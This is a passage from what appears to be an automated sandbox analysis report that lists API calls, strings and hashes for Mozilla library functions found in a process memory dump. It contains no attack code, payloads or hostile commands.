                                                                                                                            • [I %d/%d] locked_profiler_stop, xrefs: 6CC6DE83
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                            • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                            • API String ID: 1281939033-809102171
                                                                                                                            • Opcode ID: 77722f579110685922b8f2577fc901bf42be7ba9a907b9aaf894127d600285e1
                                                                                                                            • Instruction ID: 56063354a66e7d05f763dfcdb0141c677af1eb20ffe6101e78916953d7aa4945
                                                                                                                            • Opcode Fuzzy Hash: 77722f579110685922b8f2577fc901bf42be7ba9a907b9aaf894127d600285e1
                                                                                                                            • Instruction Fuzzy Hash: 63411535B012159FDB109FE6E99CBAE77B5EB4630CF244019E90997F01EB319806CBE6
                                                                                                                            Function 6CC7D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7D4F0
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC7D4FC
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC7D52A
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7D530
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC7D53F
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC7D55F
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC7D585
                                                                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC7D5D3
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7D5F9
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC7D605
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC7D652
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7D658
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC7D667
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC7D6A2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2206442479-0
                                                                                                                            • Opcode ID: ee75190491fcb02d71ebc5ba5f0efd3c7cb62dc959d6de42e0896814d0b90833
                                                                                                                            • Instruction ID: 3c87eb18506c8b9d17c32bd6b7c0b4c6c3026031cb877fbbc78f6ad094c731cb
                                                                                                                            • Opcode Fuzzy Hash: ee75190491fcb02d71ebc5ba5f0efd3c7cb62dc959d6de42e0896814d0b90833
                                                                                                                            • Instruction Fuzzy Hash: 07517DB1604709DFC704CF75D498A9ABBB4FF89318F008A2EE85A97710EB31E945CB91
                                                                                                                            Function 6CC45670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6CC456D1
                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC456E9
                                                                                                                            • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6CC456F1
                                                                                                                            • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CC45744
                                                                                                                            • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6CC457BC
                                                                                                                            • GetTickCount64.KERNEL32 ref: 6CC458CB
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC458F3
                                                                                                                            • __aulldiv.LIBCMT ref: 6CC45945
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC459B2
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6CCAF638,?,?,?,?), ref: 6CC459E9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                            • String ID: MOZ_APP_RESTART
                                                                                                                            • API String ID: 2752551254-2657566371
                                                                                                                            • Opcode ID: 20d8f32c3d222cec3a5fb896be8ac3b9bd6e24013cb65dca584044514f53fba9
                                                                                                                            • Instruction ID: 64176cdc48457deb0a2bd0066ab917161ec62927bb82ffc427552b367acda28f
                                                                                                                            • Opcode Fuzzy Hash: 20d8f32c3d222cec3a5fb896be8ac3b9bd6e24013cb65dca584044514f53fba9
                                                                                                                            • Instruction Fuzzy Hash: 2FC15871A087449FDB05CF68D44466EBBF1BF9A714F15CA1DE8C4A7660E730E886CB82
                                                                                                                            Function 6CC6EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6EC84
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6EC8C
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6ECA1
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6ECAE
                                                                                                                            • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CC6ECC5
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6ED0A
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC6ED19
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CC6ED28
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC6ED2F
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6ED59
                                                                                                                            Strings
                                                                                                                            • [I %d/%d] profiler_ensure_started, xrefs: 6CC6EC94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                            • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                            • API String ID: 4057186437-125001283
                                                                                                                            • Opcode ID: 2c45086bed6cc177f3b5712337599a1c99badbac0b9662672ab5a2b4ff14cbbf
                                                                                                                            • Instruction ID: 1eb6a1cbdb0575da2fc24edd8753a6a5a9d3a43a453cd0924fd37de251c125a1
                                                                                                                            • Opcode Fuzzy Hash: 2c45086bed6cc177f3b5712337599a1c99badbac0b9662672ab5a2b4ff14cbbf
                                                                                                                            • Instruction Fuzzy Hash: AB21D375600108AFDB009FA6ED5CAAE7B79EB4636CF144215FD1897F40FB3198068BA1
                                                                                                                            Function 6CC68ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC2EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC2EB83
                                                                                                                            • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CC6B392,?,?,00000001), ref: 6CC691F4
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                            • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                            • API String ID: 3790164461-3347204862
                                                                                                                            • Opcode ID: 9b1a0759672c123b663f4ca0ea066a8a483727a74e3ff3d3e5d1df3ea31def24
                                                                                                                            • Instruction ID: 2d10355ae55753a327345813a80ff5a67958eec2bc4598ac4ce53ec703be8238
                                                                                                                            • Opcode Fuzzy Hash: 9b1a0759672c123b663f4ca0ea066a8a483727a74e3ff3d3e5d1df3ea31def24
                                                                                                                            • Instruction Fuzzy Hash: 24B1C3B1E002099BDB04CF9AC995BEEBBB5BF85358F104019D506ABF84F7319945CBE1
                                                                                                                            Function 6CC4C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC4C5A3
                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 6CC4C9EA
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC4C9FB
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CC4CA12
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC4CA2E
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC4CAA5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                            • String ID: (null)$0
                                                                                                                            • API String ID: 4074790623-38302674
                                                                                                                            • Opcode ID: 15966005d7aceb27300380929c54aeccd6c47f7233852519dfbb326b4c718ffb
                                                                                                                            • Instruction ID: 6b4e40791709e151722f900098e8052021282fbdf6450a5576a2cb3d622fedc2
                                                                                                                            • Opcode Fuzzy Hash: 15966005d7aceb27300380929c54aeccd6c47f7233852519dfbb326b4c718ffb
                                                                                                                            • Instruction Fuzzy Hash: B7A1AC716083429FDB00EF29C55875ABBF5BF89748F04C92DE889D7651E731E809CB82
                                                                                                                            Function 6CC4C769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC4C784
                                                                                                                            • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC4C801
                                                                                                                            • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6CC4C83D
                                                                                                                            • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC4C891
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                                                            • String ID: INF$NAN$inf$nan
                                                                                                                            • API String ID: 1991403756-4166689840
                                                                                                                            • Opcode ID: 2513e28d162c23c01247c2361e4b823f198b31c74282cb6130b1bf33b15b342a
                                                                                                                            • Instruction ID: 5a6fa7c9c71e9e16fd27fcc5b564922b4a137851478871a72cc14ae236626f80
                                                                                                                            • Opcode Fuzzy Hash: 2513e28d162c23c01247c2361e4b823f198b31c74282cb6130b1bf33b15b342a
                                                                                                                            • Instruction Fuzzy Hash: 40516270A087448BD700EF6DC58569AFBF0BF8A344F00CA2DE9D5A7661F771D9898B42
                                                                                                                            Function 6CC23480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC23492
                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC234A9
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC234EF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CC2350E
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC23522
                                                                                                                            • __aulldiv.LIBCMT ref: 6CC23552
                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC2357C
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC23592
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                            • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                            • API String ID: 3634367004-706389432
                                                                                                                            • Opcode ID: 88796015ffcd97d4ce48944d5d14838b9135bebbb0b3465e6e61d348a7d5a2a5
                                                                                                                            • Instruction ID: edca76784626ace7fe6b27cc0a473ddc3877c0015f4e519c2dd12e871819611f
                                                                                                                            • Opcode Fuzzy Hash: 88796015ffcd97d4ce48944d5d14838b9135bebbb0b3465e6e61d348a7d5a2a5
                                                                                                                            • Instruction Fuzzy Hash: 34314D71A0020A9BDF14DFF9E86CAAE77B9FB45304F14442AE545A3660EB74A906CB60
                                                                                                                            Function 6CC24480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$moz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3009372454-0
                                                                                                                            • Opcode ID: 09d78717361a231a764163e70e2a4b5316004161f5fe375b213fc85ecb89f538
                                                                                                                            • Instruction ID: 1e7fe0f5cc2d97e3691db6a74c44ca4c14928219cce05ffae97bb72ddcfaae7d
                                                                                                                            • Opcode Fuzzy Hash: 09d78717361a231a764163e70e2a4b5316004161f5fe375b213fc85ecb89f538
                                                                                                                            • Instruction Fuzzy Hash: 19B1D171A005108FDB18CF3CD894B6D76A2AF42328F184629E866DFB96F738D840CB81
                                                                                                                            Function 6CC8AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1192971331-0
                                                                                                                            • Opcode ID: 52975e15bac8cc01ebd2107c160bdfbbd14bf06447058c1d5cbcad64e85213a9
                                                                                                                            • Instruction ID: 61ca9bb6bf810d48bb3faa233775f084d983d4a0a6f1238b79334797f5c1938a
                                                                                                                            • Opcode Fuzzy Hash: 52975e15bac8cc01ebd2107c160bdfbbd14bf06447058c1d5cbcad64e85213a9
                                                                                                                            • Instruction Fuzzy Hash: 443140B19057098FDB00AFB9D64C26EBFF0BF85305F01492DE98997251EB709458CB82
                                                                                                                            Function 6CC39620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC39675
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC39697
                                                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC396E8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC39707
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC3971F
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC39773
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC397B7
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC397D0
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC397EB
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC39824
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                            • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                            • API String ID: 409848716-3880535382
                                                                                                                            • Opcode ID: 47bae0984198bb12941c74970ff70abfea4d5bd61e29291f54c5439cc4d07b6c
                                                                                                                            • Instruction ID: 3924f9e0da29a3cfd9b2596d3d21062158d4c042b913507dbb5f12caab17f718
                                                                                                                            • Opcode Fuzzy Hash: 47bae0984198bb12941c74970ff70abfea4d5bd61e29291f54c5439cc4d07b6c
                                                                                                                            • Instruction Fuzzy Hash: A1416DB5A002169FDF00CFE5F89CA9A77B4EB8A354F005529ED19D7780EB30A815CBA5
                                                                                                                            Function 6CC21E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE784), ref: 6CC21EC1
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC21EE1
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE744), ref: 6CC21F38
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE744), ref: 6CC21F5C
                                                                                                                            • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CC21F83
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC21FC0
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE784), ref: 6CC21FE2
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC21FF6
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC22019
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
